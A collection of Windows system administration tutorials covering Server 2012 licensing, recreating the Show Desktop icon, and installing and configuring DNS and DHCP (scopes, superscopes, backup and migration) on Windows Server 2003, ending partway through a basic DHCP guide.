For example, a Windows 2012 Server R2 Standard edition installed on a physical server with one socket (CPU) can support up to two instances of virtual machines. These virtual machines can be Server 2012 R2 Standard or Essentials edition. Similarly, if you install a Windows Server 2012 R2 Datacenter edition, then you can install an unlimited number of virtual machines.

Let’s look at some examples on deploying Standard and Datacenter edition servers and calculating the licenses required:

Scenario 1: Install Server 2012 Standard/Datacenter Edition on a server box with four physical processors and 80 users.

In this scenario, we will be required to purchase two Standard/Datacenter Edition licenses because a single license covers up to two physical processors, plus 80 CAL licenses so our users can access the server resources.

Scenario 2: Install Server 2012 Standard Edition on a physical server with 1 physical processor, running 8 instances of virtual machines. A total of 50 users will be accessing the server.

Here, four Server 2012 Standard edition licenses are required and 50 CALs or DALs. Remember that a single Standard edition license covers up to two physical processors and up to two instances of virtual machines. Since the requirement is to run 8 instances of virtual machines, we need four Standard edition licenses.

If we decided to use the Datacenter edition in this scenario, a single license with 50 CAL would be enough to cover our needs, because the Datacenter edition license supports an unlimited number of virtual instances and up to two physical processors.

Summary

Microsoft’s Windows Server 2012 is an attractive server-based product designed to meet the demands of small to large enterprises and has a very flexible licensing model. It is very important to fully understand the licensing options and supported features on each of the 4 available editions, before proceeding with your purchase – a tactic that will help ensure costs are kept well within the allocated budget while the company’s needs are fully met.

  • Hits: 268251

How to Recover & Create "Show Desktop" Icon Function on Windows 7, Vista, XP and 2000


Wndows show desktop iconThe Show Desktop feature, included with almost all versions of Windows up to Windows 7, allows a user to minimize or restore all open programs and easily view the desktop. To use this feature, a user must simply click Show Desktop on the Quicklaunch toolbar to the right of the taskbar.

A common problem amongst Windows users is that the Show Desktop icon can accidentally be deleted, thus losing the ability to minimize all open programs and reveal your desktop.

This short article will explain how you can recover and create the Show Desktop icon and restore this functionality. The instructions included are valid for Windows 95, 98, 2000, Windows Vista and Windows 7 operating systems.

To recreate the Show Desktop icon, follow these steps:

1) Click on Start, Run, type Notepad and click on OK or Hit Enter. Alternatively, open the Notepad application.

2) Carefully copy and paste the following text into the Notepad window:

  [Shell]
    Command=2
    IconFile=explorer.exe,3
    [Taskbar]
    Command=ToggleDesktop
On the File menu, click Save As, then save the file to your desktop as Show desktop.scf. The Show Desktop icon is now created on your desktop.

 3) Finally, click and drag the Show Desktop icon to your Quick Launch toolbar.
  • Hits: 24507

Windows 2003 DNS Server Installation & Configuration

DNS is used for translating host names to IP addresses and the reverse, for both private and public networks (i.e.: the Internet). DNS does this by using records stored in its database. On the Internet DNS mainly stores records for public domain names and servers whereas in private networks it may store records for client computers, network servers and data pertaining to Active Directory.

In this article, we will install and configure DNS on a standalone Windows Server 2003. We will begin by setting up a cache-only DNS server and progress to creating a primary forward lookup zone, a reverse lookup zone, and finally some resource records. At the end of this article we will have set up a DNS server capable of resolving internal and external host names to IP addresses and the reverse.

Install DNS on Windows Server 2003

Before installing and configuring DNS on our server we have to perform some preliminary tasks. Specifically, we have to configure the server with a static IP address and a DNS suffix. The suffix will be used to fully-qualify the server name. To begin:

1. Go to Start > Control Panel > Network Connections , right-click Local Area Connection and choose Properties .

2. When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click Properties . When the Internet Protocol (TCP/IP) window comes up, enter an IP address , subnet mask and default gateway IP addresses that are all compatible with your LAN.

Our LAN is on a 192.168.1.0/24 network, so our settings are as follows:

tk-windows-dns-p1-1

3. For the Preferred DNS Server , enter the loopback address 127.0.0.1 . This tells the server to use its own DNS server service for name resolution, rather than using a separate server. After filling out those fields , click the Advanced button.

4. When the Advanced TCP/IP Settings window comes up, click the DNS tab, enter firewall.test on the DNS suffix for this connection text field, check Register this connection's address in DNS , check Use this connection's DNS suffix in DNS registration , and click OK , OK , and then Close:

tk-windows-dns-p1-2

 

Now that we have configured our server with a static IP address and a DNS suffix, we are ready to install our DNS Server. To do this:

1. Go to Start > Control Panel > Add or Remove Programs .

2. When the Add or Remove Program window launches, click Add/Remove Windows Components on the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

4. When the Networking Services window appears, place a check mark next to Domain Name System (DNS) and click OK and OK again.

 

tk-windows-dns-p1-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DNS installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the install.

After this, DNS should be successfully installed. To launch the DNS MMC, go to Start > Administrative Tools > DNS

tk-windows-dns-p1-4

As our DNS server was just installed it is not populated with anything. On the left pane of the DNS MMC, there is a server node with three nodes below it, titled Forward Lookup Zones, Reverse Lookup Zones and Event Viewer.

The Forward Lookup Zones node stores zones that are used to map host names to IP addresses, whereas the Reverse Lookup Zones node stores zones that are used to map IP addresses to host names.

Setting Up a Cache-Only DNS Server

A cache-only DNS server contains no zones or resource records. Its only function is to cache answers to queries that it processes, that way if the server receives the same query again later, rather than go through the recursion process again to answer the query, the cache-only DNS server would just return the cached response, thereby saving time. With that said, our newly installed DNS server is already a cache-only DNS server!

Creating a Primary Forward Lookup Zone

With its limited functionality, a cache-only DNS server is best suited for a small office environment or a small remote branch office. However, in a large enterprise where Active Directory is typically deployed, more features would be needed from a DNS server, such as the ability to store records for computers, servers and Active Directory. The DNS server stores those records in a database, or a zone .

DNS has a few different types of zones, and each has a different function. We will first create a primary forward lookup zone titled firewall.test . We do not want to name it firewall.cx , or any variation that uses a valid top-level domain name, as this would potentially disrupt the clients' abilities to access the real websites for those domains.

1. On the DNS MMC, right-click the Forward Lookup Zones node and choose New Zone .

2. When the New Zone Wizard comes up, click Next .

3. On the Zone Type screen, make sure that Primary zone is selected and click Next .

4. On the Zone Name screen, type firewall.test .

5. On the Zone File screen, click Next .

6. On the Dynamic Update screen, make sure that “ Do not allow dynamic updates ” is selected and click Next .

7. On the next screen, click Finish .

We now have a foundation that we can place resource records in for name resolution by internal clients.

Creating a Primary Reverse Lookup Zone

Contrary to the forward lookup zone, a reverse lookup zone is used by the DNS server to resolve IP addresses to host names. Not as frequently used as forward lookup zones, reverse lookup zones are often used by anti-spam systems in countering spam and by monitoring systems when logging events or issues. To create a reverse lookup zone:

1. On the DNS MMC, right-click the Reverse Lookup Zones node and choose New Zone .

2. When the New Zone Wizard comes up, click Next .

3. On the Zone Type screen, make sure that Primary zone is selected and click Next .

4. On the Reverse Lookup Zone Name screen, enter 192.168.1 and click Next .

5. On the Zone File screen, click Next .

6. On the Dynamic Update screen, make sure that “Do not allow dynamic updates” is selected and click Next .

7. On the next screen, click Finish .

tk-windows-dns-p1-5

There is now a reverse lookup zone titled 192.168.1.x Subnet on the left pane of the DNS MMC. This will be used to store PTR records for computers and servers in those subnets.

Using the instructions above, go ahead and create two additional reverse lookup zones, one for a 192.168.2.x subnet and for a 192.168.3.x subnet.

Creating Resource Records

DNS uses resource records (RRs) to tie host names to IP addresses and the reverse. There are different types of resource records, and the DNS server will respond with the record that is requested in a query.

The most common resource records are: Host (A); Mail Exchanger (MX); Alias (CNAME); and Service Location (SRV) for Active Directory zones. As such, we will create all but SRV records because Active Directory will create those automatically:

1. On the DNS MMC, expand the Forward Lookup Zones node followed by the firewall.test zone.

2. Right-click firewall.test zone and choose Other New Records .

3. On the Resource Record Type window, select Host (A) and click Create Record

4. On the New Resource Record window, type “ webserver001 ” on the Host text field, type “ 192.168.2.200” in the IP address text field, check the box next to “Create associated pointer (PTR) record” and click OK .

This tells DNS to create a PTR record in the appropriate reverse lookup zone. And, for demonstration purposes, it does not matter whether this server actually exists or not.

5. Back at the Resource Record Type window, select Host (A) again and click Create Record .

6. On the New Resource Record window, type “ mailserver001 ” on the Host text field and type “ 192.168.3.200” in the IP address text field. Make sure that the check box next to “Create associated pointer (PTR) record” is checked and click OK . A corresponding PTR record will be created in the appropriate reverse lookup zone.

7. Back at the Resource Record Type window, select Alias (CNAME) and click Create Record .

8. On the New Resource Record window, type “ www ” on the Alias name text field, then click Browse .

9. On the Browse window, double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test , and finally double-click webserver001 . This should populate the webserver001's fully qualified domain name in the Fully qualified domain name (FQDN) for target host text field. Click OK afterwards.

10. Back at the Resource Record Type window, select Mail Exchanger (MX) and click Create Record .

11. On the New Resource Record window, click Browse , double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test, and finally double-click mailserver001 . This should populate the mailserver001's fully qualified domain name in the Fully qualified domain name (FQDN) of mail server text field. Click OK afterwards.

12. Back at the Resource Record Type window, click Done .

Summary

Our standalone Windows Server 2003 DNS server now has a primary forward lookup zone, a primary reverse lookup zone, and multiple resource records. As a standard function, it will also cache the answers to queries that it has already resolved.

  • Hits: 73248

Windows 2003 DHCP Server Advanced Configuration - Part 2

Part 1 of our Windows 2003 DHCP Server Advanced Configuration article explained the creation and configuration of DHCP Scope options and how to configure various DHCP server settings. This article focuses on backing up and restoring the DHCP server database, troubleshooting DHCP using a packet analyser and more.

Backing up the DHCP database

Our DHCP server is fully functional but it may not always remain that way. We definitely want to back it up so we can quickly restore the functionality in the event of a disaster.

The DHCP scopes, settings and configuration are actually kept in a database file, and the database is automatically backed up every 60 minutes. But to manually back it up:

  • On the DHCP MMC, right-click the server node and choose Backup
  • When the Browse for Folder window comes up, verify that it points to C :\windows\system32\dhcp\backup and click OK:

tk-windows-dhcp-2k3-advanced-12

Restoring the DHCP Database

Let us imagine that a disaster with the DHCP server did occur and that we now have to restore the DHCP functionality. Restoring the DHCP database is just as simple as backing it up:

  1. 1. On the DHCP MMC, right-click the server node and choose Restore
  2. 2. When the Browse for Folder window comes up, click OK
  3. 3. You will receive a prompt informing you that the DHCP service will need to be stopped and restarted for the restore to take place. Click OK

The DHCP database will then be restored.

Troubleshooting DHCP

Let us imagine that, after restoring the database, the DHCP server developed some issues and started malfunctioning. Luckily, DHCP comes equipped with several tools to help us troubleshoot.

Event Viewer

The Event Viewer displays events that the server has reported and whether those events represent actual issues or normal operation. Most of the issue events related to DHCP will be reported in the System log of the Event Viewer with a Source of DHCPServer.

To view the Event Viewer:

  1. Go to Start > Administrative Tools > Event Viewer
  2. When the Event Viewer window comes up, click the System log on the left pane and its events will be displayed on the right pane.

Depending on how active the server is, the System log may be cluttered with Information, Warning and Error events that are unrelated to DHCP. To see only DHCP issues, filtering non-important events is necessary. To do this:

  1. Go to the View > Filter
  2. When the System Properties window comes up, click on the Event Source drop-down menu and select DHCPServer . This tells the log to display only DHCP server events.
  3. Next, uncheck the box next to Information . This tells the log to display only events regarding issues.
  4. (Optional) On the From and To drop-down menus on the bottom, adjust the time and date frame to when an issue was suspected to have occurred.
  5. When finished, click OK

The System log is now displaying only DHCP Warning and Error events. This should cause any DHCP-related issues to stick out:

tk-windows-dhcp-2k3-advanced-13

Every event has an Event ID. In case a particular event's description is too vague to understand, you may have to research the Event ID for further clarification.

DHCP Audit Logs

Another DHCP troubleshooting tool is the DHCP audit logs. These logs display detailed information about what the DHCP server has been doing. If a client leases an IP address, renews its IP address, or releases its IP address, the DHCP server will audit this activity.

More concerning events are also audited: if the DHCP server service stops, encounters a rogue DHCP server in the network, or fails to start, the server will audit this issue as well. These logs provide closer visibility into what the DHCP server is doing.

To access the DHCP audit logs:

  1. Go to Start > Run
  2. When the Run box comes up, type c:\windows\system32 and click OK
  3. When the System32 folder comes up, navigate to and double-click the dhcp folder.

In the dhcp folder, the log files will be titled DhcpSrvLog -%WeekDay%. log, where %WeekDay% is a week day. There should be one for the past six days.

tk-windows-dhcp-2k3-advanced-14

The log may appear overwhelming, but it is very simple to read. Each line contains several pieces of information but the most important is the code at the beginning of the line, since that describes what is being audited. That code is defined on the top portion of the log file. As each line is comma-separated you can actually save the log file in .csv format and open it in Excel for easier and more convenient reading and analysis.

Protocol Analyzer

Although a Network protocol analyzer is not an official DHCP troubleshooting tool, it is nonetheless an excellent tool for troubleshooting issues where the server is not servicing clients. In such situations you would use the protocol analyzer on the server to determine whether DHCP Discover/Request packets from clients are arriving at the server at all or if they are arriving but being ignored by the server.

If you find that the packets are not arriving at the server at all, you would have isolated the problem to most likely being a routing issue or an issue with any relay agents/configured IP helpers in the network.

However, if you find that the packets are arriving but being ignored by the server, then you would have isolated the problem to either residing on the server or the configuration of DHCP.

The screen shot below, of Wireshark, shows that the server received a DHCP Discover packet from a client and properly responded to it.

tk-windows-dhcp-2k3-advanced-15

DHCP Migration

Continuing from our previous storyline, let us pretend that we found the issue that was affecting our DHCP server but to fix it we would have to take the DHCP server offline for a considerable amount of time, so for the time being we will just setup a different server as our DHCP server.

To accomplish this, we will have to transfer the DHCP database to our new server. Migrating the DHCP database is not only done in situations such as this. When a DHCP server is decommissioned, for example, you would need to transfer the DHCP database to the new server.

Although the transfer can technically be done in more than one way, presented below is one method. Regardless of the approach chosen, you should aim to minimize the amount of time that both DHCP servers are simultaneously active and able to service clients as this would increase the chances of one server leasing an IP address that is already in use.

  1. On the old server, go to Start > Run , type cmd , and click OK .
  2. When the Command Prompt window comes up, type netsh dhcp server export c:\dhcp_backup.txt all and hit Enter. This command exports all the scopes in the DHCP database to a file titled dhcp_backup.txt .
  3. Copy the export file ( dhcp_backup.txt ) to the new server.
  4. On the new server, install the DHCP server role. Do not authorize the DHCP server yet.
  5. On the new server, go to Start > Run , type cmd , and click OK .
  6. When the Command Prompt window comes up, type netsh dhcp server import c:\dhcp_backup.txt all and hit Enter. This command imports all the scopes in the DHCP database from the file titled dhcp_backup.txt .
  7. On the new server, enable conflict detection so IP addresses that have been leased out by the old server since the start of the migration are not reissued.

a. On the DHCP MMC, right-click the server node and choose Properties

b. When the Properties window comes up, click the Advanced tab.

c. On Conflict Detection Attempts , increase the number to 2 just to be safe. This tells the server to ping an IP address before it assigns it. If there is a response, then the DHCP server will not lease out the IP address since that address would already be assigned.

d. Click OK

8. On the new server, authorize the DHCP server.

9. On the old server, unauthorized the DHCP server.

Although we could perform a migration by simply backing up the DHCP database on the old server using the backup procedure and restoring it on the new server using the restore procedure, this approach also restores the old DHCP server's configuration settings, such as audit settings, conflict detection settings, DDNS settings, etc. It may not always be desirable to transfer those settings in a migration. The procedure described above only transfers the scopes and their settings.

Conclusion

Without careful observation, the full capabilities of DHCP can be overlooked. The protocol, in combination with the DHCP MMC, provides numerous methods to control client configuration settings and server administrative functions.

  • Hits: 25732

Windows 2003 DHCP Server Advanced Configuration - Part 1

In this article, we will cover more advanced DHCP features and topics such as server options, superscopes, multicast scopes, dynamic DNS, DHCP database backup and restoration, DHCP migration, and DHCP troubleshooting. We will cover these topics in two ways: by building out from our earlier implementation and by using our imagination!

Ok, using our imagination for this purpose may seem silly but doing so will give us the opportunity to indirectly learn how, why, and where these advanced DHCP features and topics come into play in a real-world network and how other networking technologies are involved in a DHCP implementation.

We will imagine that we are building our DHCP server for a company that has two buildings, Building A and Building B, each with a single floor (for now). Building A is on a 192.168.0.0/24 network and Building B is on a 192.168.1.0/24 network.

Although each building has its own DNS server (192.168.0.252 and 192.168.1.252), WINS server (192.168.0.251 and 192.168.1.251) and Cisco Catalyst 4507R-E switch (192.168.0.254 and 192.168.1.254), only a single DHCP server exists – it is the one that we have been building and it resides in Building A.

The clients and servers in each building connect to their respective Cisco Catalyst switches and the switches are uplinked to a Cisco router for Internet connectivity. The only notable configuration is with the Building B switch: It is configured with the ip helper-address 192.168.0.253 command.

The ip helper-address command tells the switch to forward DHCP requests in the local subnet to the DHCP server, since the clients in Building B cannot initially communicate with the DHCP server directly. We are not concerned with any other configuration or networking technologies for now.

Server Options

The specifications of our imaginary company state that the company has two buildings – Building A and Building B. In our first article, we created a scope called “Building A, Floor 1” so a scope for our first building is already made. In this article, we will create a scope for Building B, Floor 1, using the instructions from our Basic DHCP Configuration article and the following specifications for the scope:

tk-windows-dhcp-2k3-advanced-1

After creating the scope, we want to activate it as well.

Notice that, in creating this scope, we had to input a lot of the same information from our “Building A, Floor 1” scope. In the event that we had several other scopes to create, we would surely not want to be inputting the same information each time for each scope.

That is where server options are useful. Server options allow you to specify options that all the scopes have in common. In creating two scopes, we noticed that our scopes had the following in common:

  • DNS servers
  • WINS servers
  • Domain name

To avoid having to enter this information again, we will create these options as server options. To do this:

1. On the DHCP MMC, right-click Server Options and choose Configure Options

tk-windows-dhcp-2k3-advanced-2

When the Server Options window comes up, take a moment to scroll down through the long list of available options. Not all options are needed or used in every environment. In some cases, however, a needed option is not available. For example, Cisco IP phones require Option 150 but because that option is not available it would have to be defined manually. Other than that, options 006 DNS Servers, 015 DNS Domain, and 003 Router are generally sufficient.

2. Scroll down to option 006 DNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, type 192.168.0.252 for the IP Address and click Add. Then enter 192.168.1.252 as another IP Address and click Add again. This will add those two servers as DNS servers.

3. Scroll down to option 015 DNS Domain Name and place a checkmark in its box. This will activate the Data Entry section. In that section, enter firewall.cx in the String Value text field.

4. Scroll down to option 044 WINS/NBNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, enter 192.168.0.251 for the IP Address and click Add. Then enter 192.168.1.251 as another IP Address and click Add again. This will add those two servers as WINS servers.

5. Scroll down to option 046 WINS/NBT Node Type and place a checkmark in its box to activate the Data Entry section. In that section, enter “0x8” for the Byte text field and click OK . This will set the workstation node type to 'Hybrid' which is preffered.

Back on the DHCP MMC, if you click on the Server Options node you will see the following:

tk-windows-dhcp-2k3-advanced-3

Subsequent scopes will inherit these options if no scope options are specified. However, if scope options are specified then the scope options would override the server options in assignment.

If we did have Cisco IP phones in our environment we would define Option 150 as follows:

1. Right-click the server node on the DHCP MMC and choose Set Predefined Options

2. When the Predefined Options and Values window comes up, click Add

3. When the Options Type window comes up, type a name for the option such as “TFTP Server for Cisco IP Phones”.

4. On the Data Type drop-down menu, select IP Address.

5. On the Code text field, enter 150.

6. On the Description text field, type a description for the scope, such as “Used by Cisco IP Phones”.

7. Check the box next to Array

8. Click OK twice.

If you go back to the Scope/Server Options window again, you will see Option 150 available.

tk-windows-dhcp-2k3-advanced-4

Dynamic DNS

At this point, our imaginary network can service a significant number of clients, but those clients can only be referenced by IP address. Sometimes it is necessary or helpful to reference clients by their host names rather than IP addresses.

DNS resolves client host names to IP addresses. But for DNS to be able to do that, client host names and IP addresses must already be registered in DNS. Servers are typically registered manually in DNS by the administrator, but workstations are not. So how do client workstations get registered in DNS? The answer is to use dynamic DNS (DDNS), a feature that will allow clients, or the DHCP server itself, to register clients in DNS automatically upon the client's assignment of an IP address. Fortunately, DDNS is setup to automatically work in a domain environment, granted that DNS is also setup correctly in the network.

To view the options available for DDNS:

  1. On the DHCP MMC, right-click the server node and choose Properties
  2. When the Properties window comes up, click the DNS tab.

If the network has some clients that are not in the domain, have legacy Windows operating systems, or are not capable of registering their host names and IP addresses in DNS, the two options marked below would need to be selected:

tk-windows-dhcp-2k3-advanced-5

But if that were the case, you would also have to specify credentials that the DHCP server would use for DDNS on behalf of the clients. To do this, you would:

  1. Click the Advanced tab on the Properties window.

tk-windows-dhcp-2k3-advanced-6

 

1.Click the Credentials button.

2. When the DNS Dynamic Update Credentials window comes up, enter an administrator username and password and firewall for the domain. In a real-world environment, you would create a separate username and password that would be used solely for DDNS and enter it here instead.

3. Click OK twice to exit the Properties window.

Superscopes

Let us imagine that the number of client workstations in Floor 1 of Building A was expanded beyond the number of available IP addresses that our “Building A, Floor 1” scope could offer. What would we do to provide IP addresses to those additional clients?

The following options may appear to be solutions, but they are not always feasible:

  1. Extend the scope to include more IP addresses.
  2. Create an additional scope for that network segment.
  3. Delete and recreate the scope with a different subnetmask that allows for more hosts.

The problem with the first option is that you may not always be able to extend the scope, depending on the scope's subnetmask and whether consecutive scopes were created based on that subnetting. The problem with the second option is that even if you create an additional scope, the DHCP server would not automatically lease out those IP addresses to clients of that physical network segment. Although the third option could work, this option may not always be optimal depending on how much additional network-based changes would also be needed to reach the solution.

There are a few options to solve this issue:

  1. Place the additional clients in a separate VLAN and create a scope for that VLAN that is in a completely different network
  2. Create a superscope that includes the exhausted scope and a new scope with available IP addresses

The first option could solve the problem but, since this is a DHCP article, we will address the problem by using DHCP features, so the second option will be our choice!

Superscopes allow you to join scopes from separate networks into one scope. Then, when one of the scopes runs out of IP addresses, the DHCP server would automatically start leasing out IP addresses from the other scopes in that superscope. However, solely creating a superscope is not the complete solution. As some clients in that network segment would have IP addresses from a different network, the segment's router interface would also have to be assigned an additional IP address that is in the same network as the additional scope.

To use this solution, we first have to create the additional scope. Here are the scope specifications:

tk-windows-dhcp-2k3-advanced-7

The scope will inherit the server options for DNS domain name, DNS server and WINS server. Activate the scope when done.

Now we will create a superscope and place the two Building A scopes in it:

  1. On the DHCP MMC, right-click the server node and choose New Superscope
  2. When the New Superscope Wizard comes up, click Next
  3. On the next screen, you are prompted to enter a name for the scope. Enter “All of Building A, Floor 1” and click Next
  4. On the next screen, you are asked to select the scopes that will be part of the superscope. Select the scopes shown below and then click Next

tk-windows-dhcp-2k3-advanced-8

 

5. On the next screen, click Finish to complete the wizard.

Back on the DHCP MCC, you will see that the two scopes selected earlier have been placed under a new scope – “Superscope All of Building A, Floor 1”.

tk-windows-dhcp-2k3-advanced-9

 

Now when the scope titled “Building A, Floor 1” runs out of IP addresses, the server will start issuing IP addresses in “Building A, Floor 1 – Extended”.

Multicast Scopes

The most common systems and applications that use multicasting have multicast IP addresses statically configured or hard-coded in some way. However, for systems and applications that need multicast IP addresses dynamically assigned, they lease them from a MADCAP (Multicast Address Dynamic Client Allocation Protocol) server, such as Windows Server 2003.

One example of such an application that leased a multicast IP address from a MADCAP server is an old application from Windows 2000 called Phone Dialer. This application allowed the creation of video conferences that people could attend. When creating a conference, the application would lease a multicast IP address from the MADCAP server and stream to that IP address. Clients wishing to join the conference would “join” that established multicast group.

Setting up a multicast scope is similar to setting up a standard scope:

  1. On the DHCP MMC, right-click the server node and choose New Multicast Scope
  2. When the New Multicast Scope Wizard comes up, click Next
  3. On the next screen, specify a Scope Name of “Video Conferencing” and a Scope Description of “Multicast scope for conference presenters.” Afterwards, click Next

tk-windows-dhcp-2k3-advanced-10

4. On the next screen, enter 239.192.1.0 in the Start IP Address field and 239.192.1.255 in the End IP Address field. Since this scope will only service video conferences within the company, we define an IP address range in the multicast organization local scope range. Leave the TTL at 32. Click Next when done.

 

tk-windows-dhcp-2k3-advanced-11

  1. On the next screen, click Next again. No exclusions need to be defined.
  2. On the next screen, set the Days to 1 and click Next
  3. On the next screen, click Next to activate the scope.
  4. On the next screen, click Finish
  5. Back on the DHCP MMC, expand the multicast scope that we just created and select Address Pool . Notice that an exclusion range encompassing the entire pool is also created. Select it and delete it.

The DHCP server can now provide multicast IP addresses. For the most part, the multicast scope functions the same as a standard scope. One different feature is that you can set a multicast scope to automatically expire and delete itself at a certain time.

To configure this:

  1. Right-click the multicast scope and choose Properties
  2. When the Properties window comes up, click the Lifetime tab.
  3. On the Lifetime tab, select “Multicast scope expires on” and select when you would like it to expire. When this date and time is reached, the server automatically deletes the scope.

Conclusion

The Advanced DHCP configuration article continues with part 2, covering the DHCP database backup and restoration, troubleshooting the DHCP service using audit logs and finally DHCP Migration.

To continue with our article, please click here: Windows 2003 Advanced DHCP Server Configuration - Part 2.

  • Hits: 54949

Windows 2003 DHCP Server Installation & Configuration

DHCP (Dynamic Host Configuration Protocol) is a protocol that allows clients on a network to request network configuration settings from a server running the DHCP server service which, in our case, will be Windows Server 2003. Additionally the protocol allows the clients to self-configure those network configuration settings without the intervention of an administrator. Some of the settings that a DHCP server can provide to its clients include the IP addresses for the DNS servers, the IP addresses for the WINS servers, the IP address for the default gateway (usually a router) and, of course, an IP address for the client itself.

This article will discuss and walk you through the steps of installing and configuring DHCP on a Windows Server 2003 member server, specifically focusing on setting up a scope and its accompanying settings. The same configuration can be applied to a standalone server even though the step-by-step details differ slightly. The upcoming 'Advanced DHCP Server Configuration on Windows 2003' article will discuss other DHCP options and features such as superscopes, multicast scopes, dynamic DNS, DHCP Backup and more.

While our articles make use of specific IP addresses and network settings, you can change these settings as needed to make them compatible with your LAN – This won't require you to make changes to your LAN, but you'll need to have a slightly stronger understanding of DHCP and TCP/IP.

Assigning the Server a Static IP Address

Before we install the DHCP server service on Windows Server 2003, we need to assign the Windows server a static IP address. To do this:

1. Go to Start > Control Panel > Network Connections , right-click Local Area Connection and choose Properties .

2.  When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click the Properties button.

3.  When the Internet Protocol (TCP/IP) window comes up, enter an IP address , subnet mask and default gateway IP address that is compatible with your LAN.

We've configured our settings according to our network, as shown below:

tk-windows-dhcp-2k3-basic-1

4. Enter 192.168.0.252 for the Preferred DNS server and 192.168.1.252 for the Alternate DNS server. The Preferred and Alternate DNS server IP addresses are optional for the functionality of the DHCP server, but we will populate them since you typically would in a real-world network. Usually these fields are populated with the IP addresses of your Active Directory domain controllers.

5. After filling out those fields, click OK and OK to save and close all windows.

Install DHCP Server Service on Windows Server 2003

Our server now has a static IP address and we are now ready to install the DHCP server service. To do this:

1. Go to Start > Control Panel > Add or Remove Programs .

2. When the Add or Remove Programs window launches, click Add/Remove Windows Components in the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

tk-windows-dhcp-2k3-basic-2

4. When the Networking Services window comes up, place a check mark next to Dynamic Host Configuration Protocol (DHCP) and click OK and OK again.

tk-windows-dhcp-2k3-basic-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DHCP installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the installation process.

Configure DHCP on Windows Server 2003

DHCP has now been successfully installed and we are ready to configure it. We will create a new scope and configure some of the scope's options. To begin:

1. Launch the DHCP MMC by going to Start > Administrative Tools > DHCP .

Currently, the DHCP MMC looks empty and the server node in the left pane has a red arrow pointing down. Keep that in mind because it will be significant later on.

tk-windows-dhcp-2k3-basic-4

2. Right-click the server node in the left pane and choose New Scope . This will launch the New Scope Wizard.

3. On the New Scope Wizard, click Next .

4. Specify a scope name and scope description. For the scope Name , enter “ Building A, Floor 1 .” For the scope Description , enter “ This scope is for Floor 1 of Building A .” Afterwards, click Next .

tk-windows-dhcp-2k3-basic-5

The scope name can be anything, but we certainly want to name it something that describes the scope's purpose. The scope Description is not required. It is there in case we needed to provide a broader description of the scope.

5. Specify an IP address range and subnet mask. For the Start IP address enter 192.168.0.1, for the End IP address enter 192.168.0.254 . Finally, specify a subnet mask of 255.255.255.0 and click Next.

Specifying the IP address range of a scope requires some knowledge of subnetting. Each scope in a DHCP server holds a pool of IP addresses to give out to clients, and the range of IP addresses must be within the allowed range of the subnet (that you specify on the subnet mask field).

For simplicity we entered a classful, class C IP address range from 192.168.0.1 to 192.168.0.254. Notice that the range encompasses the IP address of our server, the DNS servers and the default gateway, meaning that the DHCP server could potentially assign a client an IP address that is already in use! Do not worry -- we will take care of that later.

tk-windows-dhcp-2k3-basic-6

 

6. Specify IP addresses to exclude from assignment. For the Start IP address , enter 192.168.0.240 and for the End IP address enter 192.168.0.254 , click Add , and then click Next.

tk-windows-dhcp-2k3-basic-7

 

Certain network devices, such as servers, will need statically configured IP addresses. The IP addresses may sometimes be within the range of IP addresses defined for a scope. In those cases, you have to exclude the IP addresses from being assigned out by DHCP.

We have the opportunity here to define those IP addresses that are to be excluded. We specified IP addresses 192.168.0.240 to 192.168.0.254 to ensure we've included our servers plus a few spare IP addresses for future use.

7. Specify the lease duration for the scope. Verify that Days is 8 and click Next.

The lease duration is how long clients should keep their IP addresses before having to renew them.

tk-windows-dhcp-2k3-basic-8

There are a few considerations at this point. If a short lease duration is configured, clients will be renewing their IP addresses more frequently. The result will be additional network traffic and additional strain on the DHCP server. On the other hand if a long lease duration is configured, IP addresses previously obtained by decommissioned clients would remain leased and unavailable to future clients until the leases either expire or are manually deleted.

Additionally if network changes occur, such as the implementation of a new DNS server, those clients would not receive those updates until their leases expire or the computers are restarted.

As Microsoft states, “lease durations should typically be equal to the average time the computer is connected to the same physical network.” You would typically leave the default lease duration in an environment where computers are rarely moved or replaced, such as a wired network. In an environment where computers are often moved and replaced, such as a wireless network, you would want to specify a short duration since a new wireless client could roam within range at any time.

8. Configure DHCP Options. Make sure “ Yes, I want to configure these settings now ” is selected and click Next to begin configuring DHCP options.

DHCP options are additional settings that the DHCP server can provide to clients when it issues them with IP addresses. These are the other settings that help clients communicate on the network. In the New Scope Wizard we can only configure a few options but from the DHCP MMC we have several more options.

9. Specify the router IP address. Enter 192.168.0.254 as the IP address of the subnet's router, click Add , and then click Next .

The first option we can configure is the IP address for the subnet's router for which this scope is providing IP addresses. Keep in mind that this IP address must be in the same network as the IP addresses in the range that we created earlier.

tk-windows-dhcp-2k3-basic-9

 

10. Configure domain name and DNS servers. On the next page, enter “firewall.cx" for the domain name. Then enter 192.168.0.252 for the IP address of a DNS server, click Add , enter 192.168.1.252 as the IP address for another DNS server, and click Add again. When finished, click Next.

If you had a DNS infrastructure in place, you could have simply typed in the fully qualified domain name of the DNS server and clicked Resolve .

The DNS servers will be used by clients primarily for name resolution, but also for other purposes that are beyond the scope of this article. The DNS domain name will be used by clients when registering their hostnames to the DNS zones on the DNS servers (covered in the 'Advanced DHCP Server Configuration on Windows 2003' article).

tk-windows-dhcp-2k3-basic-10

 

11. Configure WINS servers. On the next screen, enter 192.168.0.251 as the IP address for the first WINS server, click Add , enter 192.168.1.251 as the IP address for the second WINS server, click Add again, and then click Finish .

tk-windows-dhcp-2k3-basic-11

 

12. Finally, the wizard asks whether you want to activate the scope. For now, choose “ No, I will activate this scope later ” and click Next and then Finish to conclude the New Scope Wizard and return to the DHCP MMC.

At this point we almost have a functional DHCP server. Let us go ahead and expand the scope node in the left pane of the DHCP MMC to see the new available nodes:

